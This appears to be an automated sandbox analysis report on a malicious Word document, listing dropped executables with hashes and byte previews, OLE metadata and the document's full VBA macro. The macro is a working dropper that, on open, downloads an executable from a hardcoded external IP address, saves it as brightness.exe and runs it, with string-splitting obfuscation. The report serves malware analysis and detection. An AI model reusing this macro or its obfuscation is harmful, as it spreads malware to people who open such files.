                                                                                                                                                                        MD5:C7A8C9CCD0074118575324C6AD87285B
                                                                                                                                                                        SHA1:5FEE525990BE478BD0DD9C38BB65315A1140190C
                                                                                                                                                                        SHA-256:D228F49F052E95B267E4DAB42958B8A039884A42C03857B3928C48F311FE3DFD
                                                                                                                                                                        SHA-512:D10673B750FF592EFB0BD0A5DD5A9260AB1ACB33635D1985DEAB716BAE20C1C7F9195EF6208DA7EAEE8F97C2A6B5832AB9DAA593FDC78A32268CC993E8B7771E
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:.....a...{..a..R...L..kJ..d...A.x.3%.>...F..:...;..-.w.,..9.w..?..9.q.a.-E..Q..@..6..32..O.....\,...k.H.y..y.J.s )..,.ug....gz..D..1..)...D..=. p.f.k.!w.@&$....qX.y.B.s_.~.6.z#K..g..OY.j.....y...s.2....i.-..gt..d......7....H[...|K_.....z\..o#.}.a._..e..*...2.t.f..:.t.R.-.....e.....>.....a../...U.%)..N....L./M.X.3W.....1$&.....A...S..U..1...(&${_.....C......*.. ).[!..Z..y.H.s....:...Xk.-%.._s..-x.2n.[W..L..J_.=n.X..x7j.P..y..=...&$u..K...o.G4..|...;A.l...7.j....b.p..h X..E..Z.k>..P.x>...;.r.....! ]...o..F..^...-..O..F ..(....R....]E.r&$*.d.-....`...<.>y.S...FY.\....?.q.e..M..._.. .h.DE..S.k.9.&&4....m$&6..|T>.#7..........=.r.}.F......7.(.....q...J..p3..M4.....D....1...i.).x.On......k.c"..9..8"..F...?.l.V..W...?..L.;...|.S.xS..?.o.?^.u.(..,.p...vN...R.s.S..^.{.`..)...1..f...8......R...a.._..J...y.<C.#9~i!6..M...\..J.P.D..6.....@...W.H>.%0...t.*..a...X..v.K..S...E%4^..0.i.........DQ.{..gT..p4...Y.h..h&$_....&$).....`...Gy.4.j./..N...P..P...c..Q..

                                                                                                                                                                        C:\Users\Public\Libraries\Nsltarpn.PIF

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1161216
                                                                                                                                                                        Entropy (8bit):7.248914742573976
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                                                                                                                                                                        MD5:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        SHA1:377F83F54D1226A181F265557804001CB9DEEE6A
                                                                                                                                                                        SHA-256:1BEC44AA19EA8DAA0B7151B312975F3F753E03F0BBCE5EBEAB8DFDA5FB736A91
                                                                                                                                                                        SHA-512:384B92D7ECBD8C5242815CB8EC6BCE0096412D2F558C61C4C91A5AFF38D3DA8CF297D40362B91C1F4620D02700954FBEE71519E4735EE4BD17413EE491220FD7
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

                                                                                                                                                                        C:\Users\Public\Libraries\npratlsN.pif

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):175800
                                                                                                                                                                        Entropy (8bit):6.631791793070417
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                                                        MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                                                        SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                                                        SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                                                        SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: PO#5_Tower_049.bat, Detection: malicious, Browse
                                                                                                                                                                        • Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: PO_B2W984.com, Detection: malicious, Browse
                                                                                                                                                                        • Filename: image.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                                                                                                        C:\Users\Public\Nsltarpn.url

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Nsltarpn.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):104
                                                                                                                                                                        Entropy (8bit):5.130245247505056
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMWJREXVLBCSsbxeBRuAzyn:HRYFVmTWDyzsVLBCSExenPG
                                                                                                                                                                        MD5:42691CC26BCE94CFC77E2F50703A6842
                                                                                                                                                                        SHA1:3258A1361DC5570FF736D2505DAF7D39E17F3347
                                                                                                                                                                        SHA-256:1B4F07E13746B1562CFF17B7781BD669ACDE1F5DD490983EBC6E94FD670CB832
                                                                                                                                                                        SHA-512:737C446CD92A13F49D01C4EEA1F32531EE4782491E368CB2A3E42A2D38B38E83529F587D1EBAB2CF2303AAB047F119F8A951727AB7D91F31907F8F2194DDBFA4
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Nsltarpn.PIF"..IconIndex=923086..HotKey=64..

                                                                                                                                                                        C:\Users\Public\NsltarpnF.cmd

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):15789
                                                                                                                                                                        Entropy (8bit):4.658965888116939
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                                                                        MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                                                                        SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                                                                        SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                                                                        SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\~DFF14912881603E0FA.TMP

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\~$ ITS15235.doc

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                        Entropy (8bit):2.887786748192681
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:KVGl/lilKlRAGlVFTPIatnzdlNkFRniRtGn:KVy/4KDjtPJsF1iRtG
                                                                                                                                                                        MD5:C1D92AF5CEEA4F15A6FFCF4C637F8C61
                                                                                                                                                                        SHA1:B37CC95AB6B4F411DA275B1594DAA2DC6C79CD45
                                                                                                                                                                        SHA-256:1C3007BE8D3FE79E2E604C432C9E3AD58802BC3E3C5066872EF7B0772309499B
                                                                                                                                                                        SHA-512:76E333DCD732C7C9BE6C3CF5A6275220F0058B0C17776D2C0793352BA9321ED2AF3B04900E7E9C6366CCB500DF876F9983A7261199357599FDF21896E89D5283
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.user..................................................j.o.n.e.s...4..........-.......u...a.i........4F...................................-..'..}..i.........=.i

                                                                                                                                                                        C:\Windows\SysWOW64\brightness.exe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1161216
                                                                                                                                                                        Entropy (8bit):7.248914742573976
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                                                                                                                                                                        MD5:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        SHA1:377F83F54D1226A181F265557804001CB9DEEE6A
                                                                                                                                                                        SHA-256:1BEC44AA19EA8DAA0B7151B312975F3F753E03F0BBCE5EBEAB8DFDA5FB736A91
                                                                                                                                                                        SHA-512:384B92D7ECBD8C5242815CB8EC6BCE0096412D2F558C61C4C91A5AFF38D3DA8CF297D40362B91C1F4620D02700954FBEE71519E4735EE4BD17413EE491220FD7
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Nadine Daniel, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sun Jan 5 21:35:00 2025, Last Saved Time/Date: Sun Jan 5 21:35:00 2025, Number of Pages: 1, Number of Words: 348, Number of Characters: 1985, Security: 0
                                                                                                                                                                        Entropy (8bit):4.315023169051503
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Microsoft Word document (32009/1) 54.23%
                                                                                                                                                                        • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                                                                        File name:PI ITS15235.doc
                                                                                                                                                                        File size:52'736 bytes
                                                                                                                                                                        MD5:1be2a4992097f506fd7ddb85625c2f1e
                                                                                                                                                                        SHA1:f197c2aa2c4c1dd1059d04309b22359d46fec69b
                                                                                                                                                                        SHA256:5573f50bf399a289981af095f020610e04ede3126835312bf7dc4de27f6bb602
                                                                                                                                                                        SHA512:02772db9177dbd1152740078b276b33d3ef79943d6057725da800b7f16af4cda8deb666a42013e8569a36ec4a57739056e496b14c9bb229e01c154c7ea19f5ea
                                                                                                                                                                        SSDEEP:384:Gp0xfMDVBv2xv8R8dFMjNCC4iKncEOqO6tJiSsqdg1vA9tz1/tfxP0jGaHfZtyga:GkUDrMOgPyU+1o9tlt1ha//vOFl
                                                                                                                                                                        TLSH:B3334321B2C1DE2BE0364875C989C6747724FDABAD95850735C97F1F7C3EA209A83B50
                                                                                                                                                                        File Content Preview:........................>.......................O...........R...............N..................................................................................................................................................................................

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:35e1cc889a8a8599

                                                                                                                                                                        Static OLE Info

                                                                                                                                                                        General

                                                                                                                                                                        Document Type:OLE
                                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                                        OLE File "PI ITS15235.doc"

                                                                                                                                                                        Indicators
                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                        Application Name:Microsoft Office Word
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                                        Contains VBA Macros:True
                                                                                                                                                                        Summary
                                                                                                                                                                        Code Page:1252
                                                                                                                                                                        Title:
                                                                                                                                                                        Subject:
                                                                                                                                                                        Author:Nadine Daniel
                                                                                                                                                                        Keywords:
                                                                                                                                                                        Comments:
                                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                                        Last Saved By:GRACE
                                                                                                                                                                        Revion Number:2
                                                                                                                                                                        Total Edit Time:0
                                                                                                                                                                        Create Time:2025-01-05 21:35:00
                                                                                                                                                                        Last Saved Time:2025-01-05 21:35:00
                                                                                                                                                                        Number of Pages:1
                                                                                                                                                                        Number of Words:348
                                                                                                                                                                        Number of Characters:1985
                                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                                        Security:0
                                                                                                                                                                        Document Summary
                                                                                                                                                                        Document Code Page:1252
                                                                                                                                                                        Number of Lines:16
                                                                                                                                                                        Number of Paragraphs:4
                                                                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                                                                        Company:
                                                                                                                                                                        Contains Dirty Links:False
                                                                                                                                                                        Shared Document:False
                                                                                                                                                                        Changed Hyperlinks:False
                                                                                                                                                                        Application Version:983040

                                                                                                                                                                        Streams with VBA

                                                                                                                                                                        VBA File Name: ThisDocument.cls, Stream Size: 4807
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/VBA/ThisDocument
                                                                                                                                                                        VBA File Name:ThisDocument.cls
                                                                                                                                                                        Stream Size:4807
                                                                                                                                                                        Data ASCII:. . . . . . . . V . . . . . . . . . ] . . . . . . . . . . . . . . ] f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i
                                                                                                                                                                        Data Raw:01 16 01 00 01 f0 00 00 00 56 05 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 5d 05 00 00 81 0f 00 00 00 00 00 00 01 00 00 00 5d 66 cd 94 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        VBA Code
                                                                                                                                                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
 
Dim xHttp:
'this is a comment



Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
'this is a comment
Dim bStrm:
'this is a comment
Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")



Dim nirm1
nirm1 = "h"
Dim nirm2
nirm2 = "t"
Dim nirm3
nirm3 = "t" & "p:/" & "/147.124.216.113/albt"
Dim nirm4
nirm4 = "."
Dim nirm5
nirm5 = "e"
Dim nirm6
nirm6 = "x"
Dim nirm7
nirm7 = "e"



Dim plpl
plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

'this is a comment
xHttp.Open "GET", plpl, False
xHttp.Send




 
With bStrm
 .Type = 1
.Open
 .write xHttp.responsebody
 
 'this is a comment
 
Dim monu1
 monu1 = "brightness"
 Dim monu2
 monu2 = "."
 'this is a comment
 Dim monu3
 monu3 = "e"
 'this is a comment
 Dim monu4
 monu4 = "x"
 'this is a comment
 Dim monu5
 monu5 = "e"
 'this is a comment
 Dim monu6
 monu6 = monu1 & monu2 & monu3 & monu4 & monu5
 
 
 .savetofile monu6, 2


Dim parveen1
Dim parveen2
Dim parveen3
Dim parveen4
Dim praveen1
praveen1 = """brightness"
Dim praveen2
praveen2 = "."
'this is a comment
Dim praveen3
praveen3 = "e"
'this is a comment
Dim praveen4
praveen4 = "x"
'this is a comment
Dim praveen5
praveen5 = "e"""
'this is a comment



Dim praveen6
praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
 


End With
 
Shell (praveen6)
 
End Sub

                                                                                                                                                                        Streams

                                                                                                                                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:114
                                                                                                                                                                        Entropy:4.235956365095031
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:4096
                                                                                                                                                                        Entropy:0.248545188854887
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                                                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:4096
                                                                                                                                                                        Entropy:0.48193968987671315
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N a d i n e D a n i e l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 74 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c8 00 00 00 06 00 00 00 d4 00 00 00 07 00 00 00 e0 00 00 00 08 00 00 00 f4 00 00 00 09 00 00 00 04 01 00 00
                                                                                                                                                                        Stream Path: 1Table, File Type: data, Stream Size: 7882
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:1Table
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:7882
                                                                                                                                                                        Entropy:5.8830839857068025
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                                                                                                                                        Data Raw:0a 06 13 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                                                                        Stream Path: Data, File Type: data, Stream Size: 4618
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Data
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:4618
                                                                                                                                                                        Entropy:4.726776485086767
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . $ . . $ . I f . . . . ! v . . h . # v . . ^ . # v . . z . # v . . 7 . # v . . . . # v . . . # v . . 4 . : V . . . . . t . . . . . . ( . 6 . , . . . . 5 . . . . ^ . 5 . . . . z . 5 . . . . 7 . 5 . . . . . . 5 . . . . . 5 . . . . 4 . 9 . . . . / . . . . . . . . . . . / . . . . / . . . . / . . . . . . . . . . . 2 . . . . . . . 2 . . . . . l . 4 . . . . . . . B . . . . a . y t V . . . $ . . $ . I f . . . . ! v . . h . # v . . ^ . # v . . z . # v . . 7 . # v . . . . # v . . . # v . . 4 . : V . . . . . t . .
                                                                                                                                                                        Data Raw:ec 00 16 24 01 17 24 01 49 66 01 00 00 00 21 76 00 06 68 01 23 76 00 01 5e 02 23 76 01 02 7a 17 23 76 02 03 37 02 23 76 03 04 10 02 23 76 04 05 c1 04 23 76 05 06 34 05 3a 56 0b 00 07 94 f4 00 0a 74 00 00 a0 04 14 f6 03 14 28 15 36 01 2c d6 03 00 06 01 35 d6 05 00 01 03 5e 02 35 d6 05 01 02 03 7a 17 35 d6 05 02 03 03 37 02 35 d6 05 03 04 03 10 02 35 d6 05 04 05 03 c1 04 35 d6 05 05
                                                                                                                                                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 382
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/PROJECT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Stream Size:382
                                                                                                                                                                        Entropy:5.323463291901678
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:I D = " { 7 9 5 7 9 D 8 5 - F 2 F 3 - 4 7 7 A - A E 8 E - 2 0 F 2 D B D C F D 5 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 6 D 4 F 0 4 A 1 0 4 A C 4 4 E C 4 4 E C 4 4 E C 4 4 E " . . D P B = " 8 6 8 4 A 0 1 A E 0 7 A 9 1 7 B 9 1 7 B 9 1 " . . G C = " 3 6 3 4 1 0 E A 7 0 2 A 2 1 2 B 2 1 2 B D E " . . . . [ H o s t E x t e n d
                                                                                                                                                                        Data Raw:49 44 3d 22 7b 37 39 35 37 39 44 38 35 2d 46 32 46 33 2d 34 37 37 41 2d 41 45 38 45 2d 32 30 46 32 44 42 44 43 46 44 35 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                                                                                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/PROJECTwm
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:41
                                                                                                                                                                        Entropy:3.0773844850752607
                                                                                                                                                                        Base64 Encoded:False
